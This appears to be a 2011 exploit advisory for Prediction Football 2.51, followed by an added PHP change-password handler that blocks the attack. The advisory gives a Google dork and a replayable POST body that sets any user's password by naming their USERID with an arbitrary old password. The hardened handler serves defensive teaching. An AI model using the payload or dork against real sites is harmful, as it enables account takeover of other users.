# Exploit Title: [title]
# Google Dork: [if relevant] intext:"Prediction football 2.51"
# Date: 08/08/2011
# Author: Smith Falcon
# Software Link: http://www.predictionfootball.com/download/download.html
# Version: 2.51
# Tested on: Linux

First create a username and go to Account Profile.
The POST variable in index.php?cmd=changepass is vulnerable to CSRF.
Grab Header Information with HTTP Live headers and replay the POST VARIABLE

&OLDPWD=anything&USERID=[id of user u want pwd changed]&PWD1=[newpass]&PWD2=[newpass]&ChangePwd=Change+Password

REPLAY with new password of the userid and logout!
Now you can login with that desired user and password!
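A hardened handler for the change-password request described above, as an added example that is not Prediction Football's own code. The field names OLDPWD, USERID, PWD1 and PWD2 come from the advisory; the csrf_token field, the session keys 'uid' and 'csrf', and the in-memory $users store are assumptions made for illustration.

```php
<?php
// Added example: server-side checks for index.php?cmd=changepass.
// Assumed names: $session['uid'], $session['csrf'], POST field 'csrf_token', $users.
function change_password(array $session, array $post, array &$users): string
{
    // 1. Only an authenticated session may change a password.
    if (!isset($session['uid'], $session['csrf'])) {
        return 'denied: not logged in';
    }
    // 2. Require the per-session anti-CSRF token, compared in constant time.
    $token = $post['csrf_token'] ?? '';
    if (!is_string($token) || !hash_equals($session['csrf'], $token)) {
        return 'denied: missing or wrong CSRF token';
    }
    // 3. The target account comes from the session; the USERID field is ignored.
    $uid = $session['uid'];
    if (!isset($users[$uid])) {
        return 'denied: unknown user';
    }
    // 4. OLDPWD must match the stored hash, so "anything" is rejected.
    $old = $post['OLDPWD'] ?? '';
    if (!is_string($old) || !password_verify($old, $users[$uid])) {
        return 'denied: wrong current password';
    }
    // 5. Both copies of the new password must be present and identical.
    $new = $post['PWD1'] ?? '';
    if (!is_string($new) || $new === '' || $new !== ($post['PWD2'] ?? null)) {
        return 'denied: new passwords do not match';
    }
    $users[$uid] = password_hash($new, PASSWORD_DEFAULT);
    return 'ok';
}

// Constructed sample data: user 7 is logged in, user 1 is another account.
$users = [1 => password_hash('admin-old', PASSWORD_DEFAULT),
          7 => password_hash('alice-old', PASSWORD_DEFAULT)];
$session = ['uid' => 7, 'csrf' => bin2hex(random_bytes(16))];

// Request shaped like the advisory's: no token, arbitrary OLDPWD, foreign USERID.
$replayed = ['OLDPWD' => 'anything', 'USERID' => '1', 'PWD1' => 'newpass',
             'PWD2' => 'newpass', 'ChangePwd' => 'Change Password'];
echo change_password($session, $replayed, $users), "\n";

// Legitimate request: valid token and current password; USERID=1 has no effect.
$legit = ['csrf_token' => $session['csrf'], 'OLDPWD' => 'alice-old', 'USERID' => '1',
          'PWD1' => 'alice-new', 'PWD2' => 'alice-new'];
echo change_password($session, $legit, $users), "\n";
var_dump(password_verify('admin-old', $users[1])); // user 1's hash is untouched
```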
Related Exploits
Trying to match OSVDBs (1): 74536
|2008-04-08||Prediction Football 1.x - 'matchid' Parameter SQL Injection||0in|